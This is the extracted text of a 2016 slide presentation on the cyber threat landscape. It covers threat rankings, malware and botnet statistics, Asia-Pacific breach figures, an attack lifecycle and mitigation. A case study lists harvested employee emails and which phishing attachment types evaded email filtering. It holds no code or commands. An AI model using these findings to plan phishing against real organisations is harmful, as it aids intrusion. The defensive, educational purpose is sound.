CYBER THREAT LANDSCAPE HARIS TAHIR
18 NOVEMBER 2016
All images used in this presentation are for educational purposes only. All images are either in the public domain and not
subject to copyright, or they have been purchased from the relevant websites. Any and all marks used throughout this
presentation are trademarks of their respective owners.
21 November 2016 10:06:06
2 of 39
Introduction Setting the right expectations
ONE
Top Cyber Threats The current threat landscape
TWO
Key Trends asia pacific region
THREE
Mitigation for the better information security
FOUR
All images used in this presentation are for educational purposes only. All images are
either in the public domain and not subject to copyright, or they have been purchased
from the relevant websites. Any and all marks used throughout this presentation are
trademarks of their respective owners.
What is Cyber Threat Landscape?
Threat Actor
Attack Vectors
Threat Agents
The Cyber Threat Landscape is a list of threats containing information about threat agents and attack vectors affecting the Information Security assurance and/or objective.
All images used in this presentation are for educational purposes only. All images are
either in the public domain and not subject to copyright, or they have been purchased
from the relevant websites. Any and all marks used throughout this presentation are
trademarks of their respective owners.
How many kinds of Threat Landscape?
Region
Group of assets
Sector
5 of 39
21 November 2016 10:06:07
All images used in this presentation are for educational purposes only. All images are either in the public domain and not
subject to copyright, or they have been purchased from the relevant websites. Any and all marks used throughout this
presentation are trademarks of their respective owners.
Factors leading to change of threat landscape
Risks
Assets
Attack vectors
Vulnerabilities
Threats
Security control
Threat agents
use
based on
to
increase
tha
t ex
plo
it
give rise to
leading to
may be aware of these
impose
Wish to abuse and/or damage
reduce
reevaluate
reduced by
to
wish to minimise
Owners
6 of 39
21 November 2016 10:06:07
All images used in this presentation are for educational purposes only. All images are either in the public domain and not
subject to copyright, or they have been purchased from the relevant websites. Any and all marks used throughout this
presentation are trademarks of their respective owners.
Risks
Assets
Attack vectors
Vulnerabilities
Threats
Security control
Threat agents
use
based on
to
increase
tha
t ex
plo
it
give rise to
leading to
may be aware of these
wish to minimise impose
Wish to abuse and/or damage
reduce
reevaluate
reduced by
to
capabilities
change over
time
introduction of new
people, process and
technology
Owners
Factors leading to change of threat landscape
All images used in this presentation are for educational purposes only. All images are either in the public domain and not
subject to copyright, or they have been purchased from the relevant websites. Any and all marks used throughout this
presentation are trademarks of their respective owners.
21 November 2016 10:06:07
7 of 39
Introduction setting the right expectations
ONE
Top Cyber Threats the current threat landscape repor t
TWO
Key Trends asia pacific region
THREE
Mitigation for the better information security
FOUR
8 of 39
21 November 2016 10:06:07
All images used in this presentation are for educational purposes only. All images are either in the public domain and not
subject to copyright, or they have been purchased from the relevant websites. Any and all marks used throughout this
presentation are trademarks of their respective owners.
# cyber threat landscape 2014 and 2015
Overview and comparison of cyber threat landscape
Top Threats 2014 Ranking Top Threats 2015 Ranking Ranking Status
Malware Malware
Web-based attacks Web-based attacks
Web application attacks Web application attacks
Botnets Botnets
Denial of service Denial of service
Spam Physical damage/theft/loss
Phishing Insider threat
Exploit kits Phishing
Data breaches Spam
Physical damage/theft/loss Exploits kits
Insider threat Data breaches
Cyber espionage Ransomware
Ransomware Cyber espionage
Legends:
Trends: declining, Stable, Increasing
Ranking: Going up, Same, Going down
All images used in this presentation are for educational purposes only. All images are
either in the public domain and not subject to copyright, or they have been purchased
from the relevant websites. Any and all marks used throughout this presentation are
trademarks of their respective owners.
20 years old malware infection (Microsoft Office documents via Visual Basic
macros)
CONFICKER still in the wild (7 years old works leads to 37% infection)
Increasing of malicious URLs compared to malicious email attachment
Mobile devices innovation slows down mobile malware
Apple store and app stores remain as a main target for “packaging” and spreading of malware
60% 60%
58% 58% 58%
Top Countries Infected
50%
12% 8% 5% 3%
Top Countries Hosting Malware
Top Cyber Threat: malicious software
All images used in this presentation are for educational purposes only. All images are
either in the public domain and not subject to copyright, or they have been purchased
from the relevant websites. Any and all marks used throughout this presentation are
trademarks of their respective owners.
Top Cyber Threat: web based attack
Social networking and social media became important tactics for infection campaigns
90% of bad URLs are used for spam (change within hours or minutes)
Malicious advertising (malvertising) campaigns uses 4000 different name and 500 domains
40%
6% 3% 2%
United State Russia Portugal Netherlands
Top Countries Hosting Maliciouis URLs
All images used in this presentation are for educational purposes only. All images are
either in the public domain and not subject to copyright, or they have been purchased
from the relevant websites. Any and all marks used throughout this presentation are
trademarks of their respective owners.
Top Cyber Threat: web application attack
30-55% web sites are vulnerable to web application attack
Lack of transport layer protection, information leakage, XSS, brute force, content sniffing, cross-
site request forgery and URL redirection
80%
7% 4% 9%
United State Brazil China Others
Top Targeted Countries
18% 28%
40%
LFI SQLi Shellshock
Top Web Attacks
All images used in this presentation are for educational purposes only. All images are
either in the public domain and not subject to copyright, or they have been purchased
from the relevant websites. Any and all marks used throughout this presentation are
trademarks of their respective owners.
Top Cyber Threat: Botnets
Between 20% and 40% of the DDoS attacks have botnet fingerprint
Reached market maturity in the area of cybercrime-as-a-service (CaaS)
Average lifetime of a botnet is estimated with 38 days, and average size of a single botnet is 1700
infected servers
Botnet operators are in favour of using rogue virtual machines for C2 server infrastructure
US, Ukraine, Russia, The Netherlands, Germany, Turkey, France, UK, Vietnam and Romania
All images used in this presentation are for educational purposes only. All images are
either in the public domain and not subject to copyright, or they have been purchased
from the relevant websites. Any and all marks used throughout this presentation are
trademarks of their respective owners.
Top Cyber Threat: Insider Threat
Reduced care, insufficient training, increased work load, inconvenience of security policies,
users do not take security seriously
Many companies do not have an insider threat prevention program
Increasing of monetization opportunities created by cyber-criminals or cyber-
espionage
Ineffective security measure for Bring Your Own Device (BYOD) and open Wi-Fi
All images used in this presentation are for educational purposes only. All images are either in the public domain and not
subject to copyright, or they have been purchased from the relevant websites. Any and all marks used throughout this
presentation are trademarks of their respective owners.
21 November 2016 10:06:09
14 of 39
Introduction setting the right expectations
ONE
Top Cyber Threats the current threat landscape repor t
TWO
Key Trends asia pacific region
THREE
Mitigation for the better information security
FOUR
15 of 39
21 November 2016 10:06:09
All images used in this presentation are for educational purposes only. All images are either in the public domain and not
subject to copyright, or they have been purchased from the relevant websites. Any and all marks used throughout this
presentation are trademarks of their respective owners.
Key trends: asia pacific region
Breaches in APAC never
make the news
headlines
Unprepared to identify
and respond to breaches
Detection period too
long
Tools exclusively
target organizations within APAC
Failed to eradicate
All images used in this presentation are for educational purposes only. All images are
either in the public domain and not subject to copyright, or they have been purchased
from the relevant websites. Any and all marks used throughout this presentation are
trademarks of their respective owners.
APAC Incident responses statistics for 2015
Characteristic Quantity (average)
Number of days compromise
went undiscovered 520
Number of machines analysed
in an organization 21,584
Number of machines
compromised by threat actor 78
Number of user accounts
compromised by threat actor 10
Number of admin accounts
compromised by threat actor 3
Amount of stolen data 3.7GB
All images used in this presentation are for educational purposes only. All images are
either in the public domain and not subject to copyright, or they have been purchased
from the relevant websites. Any and all marks used throughout this presentation are
trademarks of their respective owners.
APAC threat actor main objectives
40%
Sensitive Docs
20%
Personally
Identifiable
Information
(PII)
20%
Infrastructure
Docs
20%
18 of 39
21 November 2016 10:06:10
All images used in this presentation are for educational purposes only. All images are either in the public domain and not
subject to copyright, or they have been purchased from the relevant websites. Any and all marks used throughout this
presentation are trademarks of their respective owners.
• Custom malware • Command and
control • Web-based backdoor
• Staging servers • Data consolidation • Data theft
• Credential theft • Password cracking • “Pass-the-hash” • Local root/admin
exploitation
• Social engineering • Internet-based
attack • Via service provider
Case study: how it’s happened? Attack lifecycle model with classic attacker techniques
Initial
Attack
Establish
Foothold
Internal
Recon
Escalate
Privileges
Complete
Missions
} { • net use commands • smbclient commands • mount commands • reverse shell access
• Backdoors • VPN • Sleeper malware • Account abuse • Service provider Lateral
movement Maintain Access
All images used in this presentation are for educational purposes only. All images are
either in the public domain and not subject to copyright, or they have been purchased
from the relevant websites. Any and all marks used throughout this presentation are
trademarks of their respective owners.
Case study: social engineering
Reconnaissance
Develop attack vector
Distribution medium
Remote Access
All images used in this presentation are for educational purposes only. All images are
either in the public domain and not subject to copyright, or they have been purchased
from the relevant websites. Any and all marks used throughout this presentation are
trademarks of their respective owners.
Case study: reconnaissance
passive recon
4 pdf docs, 66 employee details
haveibeenpwned.com: 109 email addresses used in different sites
208 employee details (mostly email) from online contacts database
105 profiles
780 email addresses from an unprotected site
Search engines, associated forums, websites, social networks etc.
passive recon
Assistant manager HR services
Assistant Vice President
Company secretary
Executive secretary
Human resources dev & training consultant
Legal counsel
Project executive
Senior HR manager
Senior Vice President
Vice President
Clerk
All images used in this presentation are for educational purposes only. All images are
either in the public domain and not subject to copyright, or they have been purchased
from the relevant websites. Any and all marks used throughout this presentation are
trademarks of their respective owners.
Case study: develop attack vector
File type Status
EXE Quarantined/blocked
DLL Quarantined/blocked
JavaScript Quarantined/blocked
MSI File Quarantined/blocked
Double extension Quarantined/blocked
CVE-15-1641 doc Quarantined/blocked
PowerShell cmd Quarantined/blocked
Java code Quarantined/blocked
ASP code Quarantined/blocked
Docx (encrypted) Quarantined/blocked
Docx Quarantined/blocked
Phishing link Quarantined/blocked
Generic content
All images used in this presentation are for educational purposes only. All images are
either in the public domain and not subject to copyright, or they have been purchased
from the relevant websites. Any and all marks used throughout this presentation are
trademarks of their respective owners.
Case study: develop attack vector
Non-generic content
File type Status
EXE Quarantined/blocked
DLL Deleted
JavaScript Quarantined/blocked
MSI File Quarantined/blocked
Double extension Deleted
CVE-15-1641 doc Delivered
PowerShell cmd Delivered
Java code Delivered
ASP code Deleted
Docx (encrypted) Delivered
Docx Delivered
Phishing link Delivered
All images used in this presentation are for educational purposes only. All images are
either in the public domain and not subject to copyright, or they have been purchased
from the relevant websites. Any and all marks used throughout this presentation are
trademarks of their respective owners.
Case study: distribution medium
Packet injection
USB drop
All images used in this presentation are for educational purposes only. All images are
either in the public domain and not subject to copyright, or they have been purchased
from the relevant websites. Any and all marks used throughout this presentation are
trademarks of their respective owners.
Case study: distribution medium
All images used in this presentation are for educational purposes only. All images are
either in the public domain and not subject to copyright, or they have been purchased
from the relevant websites. Any and all marks used throughout this presentation are
trademarks of their respective owners.
Case study: remote access
All images used in this presentation are for educational purposes only. All images are either in the public domain and not
subject to copyright, or they have been purchased from the relevant websites. Any and all marks used throughout this
presentation are trademarks of their respective owners.
21 November 2016 10:06:14
26 of 39
Introduction setting the right expectations
ONE
Top Cyber Threats the current threat landscape repor t
TWO
Key Trends asia pacific region
THREE
Mitigation for the better information security
FOUR
27 of 39
21 November 2016 10:06:14
All images used in this presentation are for educational purposes only. All images are either in the public domain and not
subject to copyright, or they have been purchased from the relevant websites. Any and all marks used throughout this
presentation are trademarks of their respective owners.
Technology is not enough
Listen to the expert
Security Technologies, Cryptographer and Author
Bruce Schneier
“If you think technology can solve your
security problems, then you don’t understand
the problems and you don’t understand the
technology”
Chairman and CEO, Google
Eric Schmidt
“The Internet is the first thing that humanity
has build that humanity doesn’t understand,
the largest experiment in anarchy that we
have ever had”
All images used in this presentation are for educational purposes only. All images are
either in the public domain and not subject to copyright, or they have been purchased
from the relevant websites. Any and all marks used throughout this presentation are
trademarks of their respective owners.
No single unique solution to protect the people
People
Application
Presentation
Session
Transport
Network
Data Link
Physical
Lower Layers
Upper Layers
Most difficult to secure and the weakest link in the security chain
All images used in this presentation are for educational purposes only. All images are
either in the public domain and not subject to copyright, or they have been purchased
from the relevant websites. Any and all marks used throughout this presentation are
trademarks of their respective owners.
Security
People
Process Technology
Continue process not a static state
All images used in this presentation are for educational purposes only. All images are
either in the public domain and not subject to copyright, or they have been purchased
from the relevant websites. Any and all marks used throughout this presentation are
trademarks of their respective owners.
Securing the human it starts with you
Metric
Long term sustainment
Promoting awareness & change
Compliance focused
Non-existent
“thank you” “gracias” “terima kasih” “謝謝” “dankie” “je ve remerci” “धन्यवाद”
“Спасибо” “takk skal du ha” “고맙습니다” “hvala ti” “ありがとうございました” HARIS TAHIR
18 NOVEMBER 2016